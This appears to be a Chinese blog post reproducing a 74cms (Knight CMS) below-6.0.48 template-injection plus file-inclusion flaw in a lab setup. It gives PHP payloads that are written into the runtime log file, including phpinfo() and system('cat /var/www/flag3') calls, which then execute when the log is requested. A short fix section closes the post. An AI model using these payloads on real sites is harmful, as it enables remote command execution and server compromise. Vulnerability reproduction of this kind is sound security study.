74cms v6.0.48模版注入+文件包含getshell复现

最新推荐文章于 2022-06-04 14:52:26 发布
最新推荐文章于 2022-06-04 14:52:26 发布
阅读量5.6k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41814777/article/details/122171214
版权

漏洞描述

74cms由于函数过滤不严格导致攻击者可以通过构造执行任意代码

影响版本

骑士 CMS < 6.0.48

风险等级

漏洞环境搭建

74 cms: 74cms_Home_Setup_v6.0.20.zip
系统:ubuntu18.04.5
php环境:php 5.6
系统镜像:http://old-releases.ubuntu.com/releases/
web源码下载:https://www.74cms.com/download/index.html
准备好后直接把源码放到var/www/html目录下傻瓜式下一步下一步!

漏洞复现

① 首先构造含有phpinfo()函数的POST包:

<?php phpinfo(); ob_flush();?>/r/n

/var/www/html/data/Runtime/Logs/Home/Y_M_D.log
② 然后POST方式直接访问该日志文件,得到phpinfo的具体信息,得知一些禁用的php函数
③ 按照上述1、2的方式通过构造未禁用的函数,进行命令执行得到flag

<?php system('ls /var/www/html'); ob_flush();?>/r/n<?php system('cat /var/www/flag3'); ob_flush();?>/r/n

访问/var/www/html/data/Runtime/Logs/Home/Y_M_D.log执行写入日志文件的命令

4)flag利用截图
在这里插入图片描述
在这里插入图片描述

<?php phpinfo(); ob_flush();?>/r/n

/var/www/html/data/Runtime/Logs/Home/Y_M_D.log

在这里插入图片描述在这里插入图片描述

<?php system('ls /var/www/'); ob_flush();?>/r/n

!此时,这将作为一条日志写在默认的可执行的日志路径下:
/var/www/html/data/Runtime/Logs/Home/Y_M_D.log

在这里插入图片描述

<?php system('cat /var/www/flag3'); ob_flush();?>/r/n

访问/var/www/html/data/Runtime/Logs/Home/Y_M_D.log执行

修复建议

  1. 升级到最新版本
  2. 对函数做严格的过滤
д一点红ж
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透靶场——vulntarget-d综合靶场
tlovejr的博客
04-01 2801
部署环境 此次靶场共两个个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 信息收集 扫描主机 扫描同一网段中的存活主机 发现存活主机ip地址(其他ip是我其他机器的ip地址) 192.168.1.17 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.17 发现开放了80、81、3306、8888,看这架势应该是宝塔的界面,那就先访问端口看看 访问80端口发现不可 web渗透 访问81端口 在这里发现了一个骑士的cms框架界面 看到底下的版本信息,搜索
骑士cms人才系统(74CMS)源代码 v3.2.20120628
07-18
骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度,骑士人才系统已成国内同类软件中的最好用的人才系统。
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL注入漏洞后台演示,利用 sqlmap与burpsuit注入,需具备php基础
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
""" 声明: 本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS < 6.0.48 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更多介绍请访问笔者博客:0xtlu.github.io """
74cms 5.0.1版本文件包含漏洞复现
ANYOUZHEN的博客
06-04 616
漏洞成因:由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。下载地址: 下载后解压到phpstudy的根目录www里面输入网址,http://127.0.0.1/upload/install.php一直点击下一步,输入数据库名称和密码进入系统抓个包看看将包中的domain后面的改成 base64里面的是phpinfo经过base64编码后得到的,使用bp上面的编码模块decode 然后我们点击send进行发包,看到返回后stat
骑士CMS模版注入+文件包含getshell复现
黑白的博客
05-03 1082
声明 好好学习,天天向上 漏洞描述 骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。 骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士 CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 影响范围 骑士 CMS < 6.0.48 复现过程 这里使用6.0.20版本 使用phpstudy小白皮,好用的1P
(环境搭建+复现)74CMS模版注入+文件包含getshell
daxi0ng的博客
12-22 3330
0x00 简介 骑士CMS人才招聘系统是基于PHP+MYSQL的免费网站管理系统源码,提供完善的人才招聘网站建设方案。 0x01 漏洞概述 骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士 CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 0x02 影响版本 骑士 CMS < 6.0.48 0x03 环境搭建 1、下载最新版74cms。 https://www.74cms.com/downlo
基于PHP的骑士CMS PHP人才系统源码(74cms) 正式版.zip
08-26
基于PHP的骑士CMS PHP人才系统源码(74cms) 正式版.zip
74cms v4.2.1 v4.2.129 后台getshell漏洞.md
最新发布
04-08
74cms v4.2.1 v4.2.129 后台getshell漏洞.md
74cms v4.2.X任意文件读取漏洞
09-06
在网络安全领域,74cms v4.2.X任意文件读取漏洞是一个重要的安全问题,影响了74cms的多个版本,包括v4.2、v4.2.3以及v5.0.1。这个漏洞允许攻击者通过特定的手段读取服务器上任意文件,这可能导致敏感信息泄露,甚至...
骑士PHP人才系统(74CMS)源代码 v3.0
11-09
 骑士CMS-PHP人才系统源码,功能模块专业,系统以招聘求职模块与诸多实用辅助模块组成,专业、强大、实用、易用。在布局上科学严谨,给用户赏心悦目的视觉感受,而且程序开源免费、安全稳定,拥有WEB2.0新技术使系统拥有一流的用户体验。
74cms 骑士人才系统源代码
03-18
骑士cms人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度,骑士人才
最新骑士人才系统 74cms V4.2.3 单城市商业版源码分享,含3套模板,求职招聘系统源码
03-25
最新骑士人才系统 74cms V4.2.3 单城市商业版源码分享,含3套模板,求职招聘系统源码
74cms骑士人才招聘系统源码SE版-PHP
06-25
骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。骑士人才系统拥有十多年的人才招聘系统运营解决方案,同时我们提供智能化招聘系统、招考系统等全方位系统化解决方案。 骑士人才系统SE版 更懂运营的地方人才招聘系统 SE版本拥有更易用的运营方案、更高效的技术方案、更智能的数据方案、更简洁的管理方案。 骑士人才系统SE版,SE取自Special Edition的首字母,意为骑士人才系统特别版。提供免费版、创业版、标准版、专业版四个版本。 系统兼容性和环境要求 系统环境:WIN/LIN WEB服务:Apache/Nginx/IIS PHP版本:5.5及以上(建议7.0以上) MySQL版本:5.7.6及以上 产品特性 采用VUE前端框架 采用TP5.0后台框架 前后端完全分离 提高并发处理能力 支持触屏首页DIY 集成大数据画像报表 集成大数据精准营销 页面重构,提升使用体验 支持PC、触屏、APP、小程序全端 版权信息 本系统版权归骑士CMS所有。 未获商业授权之前,您不得将本软件用于任何用途。购买商业授权请联系官网。 获得商业授权之后,您可以将本软件应用于商业用途,同时依据所购买的授权类型中确定的技术支持内容,自购买时刻起,在技术支持期限内拥有通过指定的方式获得指定范围内的技术支持服务。反馈意见建议请直接联系您的专属客服,期待我们一起进步。 更新日志 v2.3.0 【新增】后台导入简历功能 【新增】移动端首页弹窗广告 【新增】后台新增生成海报及一键复制职位信息 【新增】接入百度百聘 【新增】PC首页底部引导栏 【新增】PC页面右侧固定漂浮客服 【新增】触屏SEO支持 【新增】触屏页面管理,包含缓存设置及seo设置 【新增】热门关键词管理 【新增】qq登录、微信登录开关 【新增】触屏简历漂浮生成海报 【修正】社群推文营销标签表不存在问题 【修正】微信小程序特定情况下企业名称无法填写问题 【修正】触屏地图搜索职位列表无法弹出问题 【修正】后台安全配置中的开关对触屏注册验证码不起控制作用问题 【修正】微信自定义菜单保存排序问题 【修正】pc企业会员中心套餐分页问题 【修正】触屏注册简历期望职位限制必须3级问题 【修正】积分购买增值服务扣除双倍积分问题 【修正】pc个人会员中心首页完善简历链接错误问题 【修正】休眠用户提醒生成企业数量错误问题 【修正】场景码下载路径问题 【修正】社群推文营销指定企业搜索时bug 【修正】公众号营销单企业推广中搜索企业后的职位数量不正确问题 【优化】同城-广告位分类尺寸 【优化】后台增值服务价格填写数字类型优化 【优化】购买套餐、增值服务等推荐和限时标识优化 【优化】pc发布职位时可搜索职位类型 【优化】触屏简历填写是隐藏项必填提示优化 【优化】后台删除简历、企业、会员时提示语优化 【优化】后台编辑器上传图片由base64保存方式改为url保存,减小内容长度 【优化】取消举报信息内容至少20个字的限制 【优化】举报信息错误提示遮挡问题优化 【优化】触屏注册简历在微信字段不显示的情况下重叠问题 【优化】已过期会员套餐名称显示优化 【优化】特定情况下触屏编辑简历页空白问题优化 【优化】自由职业页面标题统一 【优化】企业详情页可能感兴趣的企业区块响应 【优化】生成海报改为后端生成 【优化】触屏地图找工作标签样式 【优化】PC首页懒加载 v2.2.0 【新增】pc自由职业详情页缓存设置 【修正】微信小程序详情页底部网站名称调用缺失问题 【修正】自由职业-登记信息项目经历时间选择范围调整 【修正】自由职业-项目管理-编辑项目点击返回按钮404问题 【修正】自由职业-PC项目详情和简历详情及列表页二维码生成失败问题 【修正】计划任务批量刷新职位报错问题 【修正】触屏菜单链接自定义url无效问题 【修正】社群推文营销修改生成内容后复制内容不改变问题 【优化】社群推文营销注册、登录地址优化 【优化】移动端访问pc注册、登录页自动跳转 【优化】优化登录验证流程 【优化】底部信息关注优化 【优化】小程序分享logo调用方形Logo 【优化】后台同城分类配置列表优化 【优化】自由职业、同城路由优化 【优化】自由职业查看联系方式提示优化 v2.1.0 【修正】社群推文营销点击生成没反应问题 【修正】触屏填写企业资料时提示地区未选择问题 【修正】pc首页顶部导航帮助中心链接错误问题 v2.0.0 【新增】后台营销工具新增社群推文营销 【新增】触屏端职位详情推文营销 【新增】自由职位模块 【新增】同城信息模块 【新增】校园招聘 【新增】移动端后台 【新增】IP黑名单功能 【新增】敏感词过滤功能 【新增】管理员删除/导出权限独立设置 【新增】管理员微信绑定 【修正】微信扫码企业、职位、简历等公众号报故
74cms PHP骑士人才系统 v3.5.1.rar
07-10
74cms PHP骑士人才系统是一套免费开源的专业人才网站系统,模板自由切换、后台管理功能丰富等。基于PHP的人才系统不是太多,希望74cms 骑士人才系统可以帮上你的忙。骑士cms人才系统PHP版 v3.5.1 bulid2014.11.28 更新:   新增 删除企业风采增加确认操作、订阅与意见反馈安全验证   修正 猎头头像显示不正常问题   修正 后台查看简历经历时间显示不正常问题   修正 简历转为word暴露邮箱问题   修正 触屏版简历、职位浏览次数异常问题   修正 修改简历期望职位不验证问
74cms 骑士人才系统 v5.0.1 正式版
10-02
74cms_v5.0.1这个压缩包文件包含了该系统的完整安装包,包括必要的PHP文件、数据库配置文件、模板文件以及可能的文档和帮助文件。在部署时,用户需要按照官方提供的安装指南进行操作,包括服务器环境配置、数据库...
74cms骑士人才招聘网系统网站源码 SE版
banzhuan678的博客
04-20 1617
介绍: 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费+ 开源专业人才招聘系统。 骑士人才系统拥有十多年的人才招聘系统运营解决方案,同时我们提供智能化招聘系统、招考系统等全方位系统化解决方案。 骑士人才系统SE版 更懂运营的地方人才招聘系统 SE版本拥有更易用的运营方案、更高效的技术方案、更智能的数据方案、更简洁的管理方案。 骑士人才系统SE版,SE取自Special Edition的首字母,意为骑士人才系统特别版。 提供免费版、创业版、标准版、专业版四个版本。 系统兼容性和环境要求 系统环境
php getshell漏洞,74cms前台某处Getshell漏洞(SSTI)
weixin_28406969的博客
03-17 492
这是一个服务端模板注入漏洞。Application/Home/Controller/MController.class.phpnamespace Home\Controller;use Common\Controller\FrontendController;class MController extends FrontendController{public function index(){i...
74cms前台getshell漏洞
qq_51922767的博客
12-09 990
74cms前台getshell漏洞
eyoucms后台插件模块存在任意文件上传导致getshell 74cms v3.6前台存在mysql数据
06-09
感谢您向我提出问题。这些都是严重的安全问题,需要尽快得到解决。 对于eyoucms后台插件模块任意文件上传漏洞,建议您立即升级eyoucms或者删除该插件,以避免攻击者利用此漏洞攻击您的系统。如果您已经受到攻击,建议您立即停止服务器,并进行全面检查和修复。 对于74cms v3.6前台存在mysql数据漏洞,建议您立即升级到最新版本,并将所有输入数据进行过滤和验证,以避免SQL注入攻击。同时,建议您对服务器进行全面检查和修复,以确保系统的安全性。 总的来说,保持系统的安全性需要您不断地关注漏洞信息,并及时采取相应的措施,同时也需要您加强对系统的安全性监控和防御能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值